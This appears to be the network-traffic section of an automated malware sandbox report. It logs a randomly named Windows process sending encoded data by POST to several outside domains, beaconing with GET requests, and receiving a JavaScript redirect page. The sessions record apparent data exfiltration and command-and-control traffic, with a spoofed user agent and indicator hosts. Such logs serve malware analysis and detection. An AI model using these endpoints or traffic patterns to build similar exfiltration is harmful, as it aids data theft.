                                                          4192.168.2.74997327.124.4.246801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:17:20.910490036 CET512OUTGET /sgdd/?T0_8iD=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRkS1PAtAoaZepRK9DWNRExJFD195AoHoFNlqSomGJ/HVUmVYGX8lvunC&DfkXi=Fj7DJJpHnHupXFB HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.laohub10.net
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Nov 20, 2024 10:17:21.834981918 CET525INHTTP/1.1 200 OK
                                                          Server: Apache
                                                          Content-Type: text/html; charset=utf-8
                                                          Accept-Ranges: bytes
                                                          Cache-Control: max-age=86400
                                                          Age: 1
                                                          Connection: Close
                                                          Content-Length: 350
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.749974149.88.81.190801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:17:27.429315090 CET760OUTPOST /rq1s/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.xcvbj.asia
                                                          Origin: http://www.xcvbj.asia
                                                          Referer: http://www.xcvbj.asia/rq1s/
                                                          Cache-Control: no-cache
                                                          Content-Length: 219
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 6d 73 79 56 74 71 48 67 47 4a 33 6e 30 6e 2b 6c 65 58 2f 62 76 58 31 6d 69 43 48 37 42 35 53 36 6b 4e 68 56 4e 47 75 73 65 31 2f 31 6d 36 6f 63 4f 4d 76 6e 76 7a 63 4d 5a 30 45 53 76 6e 6b 31 39 79 59 67 31 42 33 73 61 6f 32 67 79 70 45 6e 64 71 2f 74 6f 42 30 53 79 43 57 4e 41 73 4c 51 71 74 6f 74 61 57 59 77 68 32 31 73 51 75 57 64 76 6e 6b 4e 4b 53 7a 42 4f 4b 79 47 6e 64 46 75 49 61 44 48 2f 41 2b 44 38 4a 79 39 2b 58 4c 35 75 68 6e 4a 6d 6a 32 4c 55 75 38 6e 57 69 79 76 6d 39 5a 31 51 65 53 41 64 76 4e 52 4c 49 73 47 79 49 32 2f 49 63 59 66 31 79 72 49 73 38 72 68 53 35 75 48 67 3d 3d
                                                          Data Ascii: T0_8iD=xj4K+ejgT/JOWmsyVtqHgGJ3n0n+leX/bvX1miCH7B5S6kNhVNGuse1/1m6ocOMvnvzcMZ0ESvnk19yYg1B3sao2gypEndq/toB0SyCWNAsLQqtotaWYwh21sQuWdvnkNKSzBOKyGndFuIaDH/A+D8Jy9+XL5uhnJmj2LUu8nWiyvm9Z1QeSAdvNRLIsGyI2/IcYf1yrIs8rhS5uHg==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.749975149.88.81.190801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:17:29.990690947 CET780OUTPOST /rq1s/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.xcvbj.asia
                                                          Origin: http://www.xcvbj.asia
                                                          Referer: http://www.xcvbj.asia/rq1s/
                                                          Cache-Control: no-cache
                                                          Content-Length: 239
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 52 53 6a 41 42 68 62 70 61 75 67 2b 31 2f 39 47 36 70 53 75 4d 6b 6e 76 32 70 4d 59 59 45 53 72 50 6b 31 2f 36 59 68 47 70 30 75 4b 6f 6a 35 43 70 47 6a 64 71 2f 74 6f 42 30 53 79 6e 37 4e 42 49 4c 4d 4c 64 6f 73 37 57 62 7a 68 32 79 72 51 75 57 5a 76 6e 67 4e 4b 53 30 42 4c 54 36 47 6b 31 46 75 49 4b 44 47 75 41 2f 5a 73 4a 38 35 2b 57 65 35 64 56 6a 42 57 2f 6b 53 43 6d 46 6d 30 4b 75 71 51 38 37 76 79 53 2b 65 4d 58 32 56 4a 73 61 52 55 56 44 39 4a 59 41 53 58 47 4b 58 62 5a 42 73 41 59 71 52 64 6e 71 55 62 57 79 4d 6e 41 31 46 2f 6c 4c 68 72 5a 4d 46 74 6f 3d
                                                          Data Ascii: T0_8iD=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7URSjABhbpaug+1/9G6pSuMknv2pMYYESrPk1/6YhGp0uKoj5CpGjdq/toB0Syn7NBILMLdos7Wbzh2yrQuWZvngNKS0BLT6Gk1FuIKDGuA/ZsJ85+We5dVjBW/kSCmFm0KuqQ87vyS+eMX2VJsaRUVD9JYASXGKXbZBsAYqRdnqUbWyMnA1F/lLhrZMFto=


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.749976149.88.81.190801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:17:32.550837040 CET1793OUTPOST /rq1s/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.xcvbj.asia
                                                          Origin: http://www.xcvbj.asia
                                                          Referer: http://www.xcvbj.asia/rq1s/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1251
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 4a 53 2f 6c 64 68 55 6f 61 75 68 2b 31 2f 69 32 36 73 53 75 4d 35 6e 72 61 6c 4d 5a 6b 55 53 74 4c 6b 30 61 32 59 77 48 70 30 30 61 6f 6a 6b 79 70 4c 6e 64 72 39 74 6f 52 4b 53 79 58 37 4e 42 49 4c 4d 49 56 6f 39 71 57 62 2f 42 32 31 73 51 75 4b 64 76 6d 33 4e 4b 61 43 42 4c 65 59 47 56 56 46 74 6f 36 44 46 63 34 2f 53 73 4a 2b 31 65 58 64 35 64 49 39 42 57 7a 4f 53 43 37 67 6d 33 71 75 6f 32 70 57 31 79 57 32 48 38 50 6f 55 70 4d 73 55 32 51 2b 33 4f 30 6f 55 57 66 70 63 49 56 64 6c 77 59 59 56 4b 4b 4c 4e 34 54 43 58 57 73 79 4d 5a 63 34 78 6f 46 68 65 6f 69 63 4b 49 55 2f 6c 50 65 43 50 76 71 73 6b 6a 46 72 79 39 64 69 39 66 58 78 31 77 53 74 4b 42 6b 2f 57 42 46 34 50 61 47 37 4f 77 47 75 74 30 34 35 70 42 38 75 2b 7a 4d 37 38 64 37 64 2b 56 76 32 35 51 37 6d 58 32 58 71 6e 4c 54 55 51 4b 46 65 38 4a 39 4e 6e 38 2f 44 66 6e 2b 37 43 2f 34 2b 6a 58 71 [TRUNCATED]
                                                          Data Ascii: T0_8iD=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7UJS/ldhUoauh+1/i26sSuM5nralMZkUStLk0a2YwHp00aojkypLndr9toRKSyX7NBILMIVo9qWb/B21sQuKdvm3NKaCBLeYGVVFto6DFc4/SsJ+1eXd5dI9BWzOSC7gm3quo2pW1yW2H8PoUpMsU2Q+3O0oUWfpcIVdlwYYVKKLN4TCXWsyMZc4xoFheoicKIU/lPeCPvqskjFry9di9fXx1wStKBk/WBF4PaG7OwGut045pB8u+zM78d7d+Vv25Q7mX2XqnLTUQKFe8J9Nn8/Dfn+7C/4+jXqlFSMdCLIkw/STqEVxluvhR65C/53cFUngoj7pGH0C1M6Q9E/ohAmHdu52d2B+v91Lwiph01Xadcm+13L90M+HS/P5S35pYCYd8RRlvIg40gVIOzm6Upcx476mFo1e1pcbv4eI8gA02+XazVEJGPCr2p+WFYj5SYwEvix9+eooKKG3503YReIS8JKlc5lyjfbZFk6Y7mmkmpqljUC1G/HZ+SKQr9CAdySJdfrn6PE0t9kraqc18U56wDz1GIr91J5vpRyHUZaVo8bnwFk5iIt1s6kqJ3zUHOm+qPSDru9NzaHn+ivVab0jGiDZQ+t/CbK+gMi6t4j5FqFGNNmZ3UNFBMpPhOPLOQRvK+yagCQobP/iVgpjQ+ujs86lRfaVQDwUUztJHglGKulbOg10z3S/1mCy1SkhEDuTcgmzW+A5PxlTaeMv4w2f5go6hZgsI5qSQJbFDXOL2xarhs0tOXWzaxUiDPN/yHcWMb8RKdZpJjxe73fRLEextZxL/4rgzTL/+IGsSizSzRlnKp0Sq4YCjc9JKSvrxbW0rjkdqzJyGjY91wOwlr1nJVbD2vlzV6mS6Wba8S7LhbLDx+ju7QsFJwJDMmrBJhnTvvAQt3i6nuOKb7zyAEUTwnqIeT8fGrCDZD6aYONKcWWHe/AoTWpkl/UoVQRuEt4Ra [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.749978149.88.81.190801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:17:35.097934008 CET510OUTGET /rq1s/?DfkXi=Fj7DJJpHnHupXFB&T0_8iD=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF2dA9kmJOo/iChJNgRxeiNAYAV69e8LLl8H7JijDWWPyzVI6kJ7OFKWsx HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.xcvbj.asia
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.74997985.159.66.93801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:18:01.740593910 CET769OUTPOST /rum2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.soainsaat.xyz
                                                          Origin: http://www.soainsaat.xyz
                                                          Referer: http://www.soainsaat.xyz/rum2/
                                                          Cache-Control: no-cache
                                                          Content-Length: 219
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 48 76 61 4c 35 69 4c 4f 6e 76 2f 34 51 4c 46 73 55 76 70 33 64 52 50 66 41 65 6b 6c 74 38 6a 32 30 31 6b 36 42 69 4c 61 61 44 58 6c 41 33 53 6d 49 6d 59 33 68 71 72 33 43 6b 4e 56 6c 4b 37 37 64 73 77 31 48 49 73 30 52 4e 61 73 73 39 53 55 56 44 61 76 34 71 5a 4c 55 78 2b 46 64 58 4b 44 33 33 72 38 37 59 32 59 59 76 55 48 59 73 63 4a 6f 48 78 43 71 44 4b 5a 33 43 55 57 42 2f 36 77 57 65 4f 66 41 57 6f 4f 58 6f 79 69 55 6c 72 46 4b 4a 52 6f 72 39 6a 43 46 32 50 4d 59 76 46 32 41 69 63 37 38 43 53 6e 78 72 68 70 4e 76 6d 2b 2b 4a 4f 7a 6c 57 73 58 53 6d 69 67 6a 57 58 39 6d 31 72 38 77 3d 3d
                                                          Data Ascii: T0_8iD=8OxGdHNGhDPGSHvaL5iLOnv/4QLFsUvp3dRPfAeklt8j201k6BiLaaDXlA3SmImY3hqr3CkNVlK77dsw1HIs0RNass9SUVDav4qZLUx+FdXKD33r87Y2YYvUHYscJoHxCqDKZ3CUWB/6wWeOfAWoOXoyiUlrFKJRor9jCF2PMYvF2Aic78CSnxrhpNvm++JOzlWsXSmigjWX9m1r8w==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.74998085.159.66.93801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:18:04.288911104 CET789OUTPOST /rum2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.soainsaat.xyz
                                                          Origin: http://www.soainsaat.xyz
                                                          Referer: http://www.soainsaat.xyz/rum2/
                                                          Cache-Control: no-cache
                                                          Content-Length: 239
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 59 6a 31 56 46 6b 67 46 32 4c 5a 61 44 58 72 67 33 54 73 6f 6d 47 33 68 75 56 33 47 6b 4e 56 6c 75 37 37 66 45 77 31 51 63 76 6d 78 4e 45 6b 4d 39 51 61 31 44 61 76 34 71 5a 4c 55 31 55 46 65 6e 4b 45 48 48 72 39 65 30 31 56 34 76 58 41 59 73 63 43 49 48 31 43 71 44 53 5a 79 62 50 57 44 48 36 77 57 4f 4f 65 56 36 72 48 58 6f 30 2f 45 6c 31 4c 2f 77 31 74 49 6c 49 4c 56 71 46 44 2f 72 32 36 57 6a 2b 68 65 4f 2b 35 67 54 61 74 50 4c 51 70 59 55 37 78 6b 53 30 61 77 53 44 2f 55 7a 39 77 30 55 76 71 46 4e 63 52 57 49 38 46 61 49 44 72 66 48 79 38 2f 77 4e 4a 33 55 3d
                                                          Data Ascii: T0_8iD=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfYj1VFkgF2LZaDXrg3TsomG3huV3GkNVlu77fEw1QcvmxNEkM9Qa1Dav4qZLU1UFenKEHHr9e01V4vXAYscCIH1CqDSZybPWDH6wWOOeV6rHXo0/El1L/w1tIlILVqFD/r26Wj+heO+5gTatPLQpYU7xkS0awSD/Uz9w0UvqFNcRWI8FaIDrfHy8/wNJ3U=


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.74998185.159.66.93801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:18:06.953710079 CET1802OUTPOST /rum2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.soainsaat.xyz
                                                          Origin: http://www.soainsaat.xyz
                                                          Referer: http://www.soainsaat.xyz/rum2/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1251
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 51 6a 31 6e 4e 6b 36 69 4b 4c 59 61 44 58 30 51 33 65 73 6f 6e 44 33 6c 43 52 33 47 67 33 56 6e 6d 37 39 4f 6b 77 69 52 63 76 2f 42 4e 45 6d 4d 39 54 55 56 43 61 76 34 61 6e 4c 55 46 55 46 65 6e 4b 45 42 4c 72 72 37 59 31 58 34 76 55 48 59 73 41 4a 6f 48 64 43 71 62 6f 5a 7a 4b 36 57 54 6e 36 78 79 53 4f 64 6e 69 72 49 58 6f 32 38 45 6b 6d 4c 2f 30 71 74 4c 42 45 4c 57 32 38 44 34 6e 32 34 51 32 71 78 65 57 70 76 68 50 6c 6c 4a 48 63 6b 5a 77 61 35 6c 47 69 48 67 79 52 39 32 58 6c 2f 43 34 75 6f 42 6b 46 52 47 45 64 46 61 74 50 76 6f 47 57 67 74 67 52 63 42 78 52 52 75 58 35 68 58 64 54 58 57 35 36 30 42 6a 51 6a 71 7a 77 62 68 71 59 35 52 6b 57 46 2b 6a 35 66 5a 6e 62 4b 74 55 45 68 6e 54 50 35 39 44 4d 66 43 67 47 4f 64 75 42 62 65 34 69 52 7a 61 48 4c 2b 43 48 44 47 46 34 6c 47 57 32 52 72 78 74 46 33 74 4e 35 30 41 55 79 4d 57 68 64 72 4e 2b 4d 6c 30 [TRUNCATED]
                                                          Data Ascii: T0_8iD=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfQj1nNk6iKLYaDX0Q3esonD3lCR3Gg3Vnm79OkwiRcv/BNEmM9TUVCav4anLUFUFenKEBLrr7Y1X4vUHYsAJoHdCqboZzK6WTn6xySOdnirIXo28EkmL/0qtLBELW28D4n24Q2qxeWpvhPllJHckZwa5lGiHgyR92Xl/C4uoBkFRGEdFatPvoGWgtgRcBxRRuX5hXdTXW560BjQjqzwbhqY5RkWF+j5fZnbKtUEhnTP59DMfCgGOduBbe4iRzaHL+CHDGF4lGW2RrxtF3tN50AUyMWhdrN+Ml0BG2Mx4+s2XKBJvY+O+SvB23663qEOt3qjS+vU6Rd/L0O+Ds6+Hjklmo2r8AHORO5clcNBH5bMgkYpLkUNOPAB4sCNcqpa+OgbbM27ZwSqZALraS71IP4EbCmnPkatdzofAv3Odyzt3ObbKMhbb4lyJ4t1tO3jWLdPJEwZvza0QaSqey2DeQjTHiCetXfMFnzW0oT+hAJPAPCmJKEPbYSromeiJwVXvYzHYcvLLpOw+w6+4QZF9ngQUXmZJbBJVmNXqcgDQggwoOzzOzAUpTTP6rvM/+lBBxJCzXrb+JSjBgBday+Om87MYyxl/BpxMsCl2xVUEITvCoxVGCS9fEWykIWu9QGzgBhxptqamOC16IqH1CiIdmVVMGzOZ6fI2/+6v5M8qwtik8cdL+Id6NBVP5kxSkPFQjAANBRPyJ9cNjoXeoYitOxyalBI8t8MLgW27cO3SPiQEWeDve2W6IUQeXnOWNDGuGTjTpAV1PmmSbIp+rvwsybmzk1Kt1y+I1F/yAE3WJbdEdEAL/XIPpCNOMEffmYNDHXT3Lh46qtK88tIO9HA/0+CiNlcTmuNvvK9Qg9DRlA+/SQby2cmVCFw1eEOydcwdX78/fh/z8UauXhqcxg28OqtRC82wUBSiYJ587Nl3lLU3HDqjYwglAKSpToN0MtyU+KJa [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.74998285.159.66.93801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:18:09.509727955 CET513OUTGET /rum2/?T0_8iD=xMZmeyR85UPBdQXGVprUO1LR43iXmFfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygBklMYuscQT2HkpLyNPn9BFbXFeEnLsptAV62eKo1GBtyCHJXjeCmlGyKQ&DfkXi=Fj7DJJpHnHupXFB HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.soainsaat.xyz
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Nov 20, 2024 10:18:10.266968966 CET225INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.14.1
                                                          Date: Wed, 20 Nov 2024 09:18:10 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          X-Rate-Limit-Limit: 5s
                                                          X-Rate-Limit-Remaining: 19
                                                          X-Rate-Limit-Reset: 2024-11-20T09:18:15.1544851Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.749983185.27.134.144801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:18:15.374806881 CET763OUTPOST /d9ku/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.amayavp.xyz
                                                          Origin: http://www.amayavp.xyz
                                                          Referer: http://www.amayavp.xyz/d9ku/
                                                          Cache-Control: no-cache
                                                          Content-Length: 219
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 5a 57 4a 61 48 49 4b 66 4d 46 42 50 74 47 64 6d 78 6d 69 75 48 54 31 74 42 76 37 55 58 41 6c 63 6d 52 6f 59 75 43 61 68 63 33 63 46 51 57 71 72 41 30 4a 31 74 50 72 44 4e 43 50 61 69 4d 51 67 72 4e 5a 34 6c 74 4e 4b 4b 63 6e 6c 74 70 71 61 42 7a 39 4d 37 75 53 67 68 6e 55 6c 37 49 49 6e 64 4d 78 44 45 46 70 30 48 74 51 34 44 51 4e 70 6b 59 7a 62 38 4b 7a 6b 6b 6a 6c 4c 57 78 53 41 77 71 4b 37 6c 76 41 46 44 5a 45 6c 64 75 58 6d 36 45 42 6d 74 61 73 53 66 33 76 7a 6d 62 77 71 7a 4a 6e 32 33 55 4e 65 42 58 49 31 4f 55 70 2b 57 34 48 6b 45 53 55 6f 61 6f 73 6a 51 54 31 50 4f 44 44 55 52 41 3d 3d
                                                          Data Ascii: T0_8iD=lCOuZ0pdMNytZWJaHIKfMFBPtGdmxmiuHT1tBv7UXAlcmRoYuCahc3cFQWqrA0J1tPrDNCPaiMQgrNZ4ltNKKcnltpqaBz9M7uSghnUl7IIndMxDEFp0HtQ4DQNpkYzb8KzkkjlLWxSAwqK7lvAFDZElduXm6EBmtasSf3vzmbwqzJn23UNeBXI1OUp+W4HkESUoaosjQT1PODDURA==
                                                          Nov 20, 2024 10:18:15.987128973 CET684INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 20 Nov 2024 09:18:15 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                          Cache-Control: no-cache
                                                          Content-Encoding: br
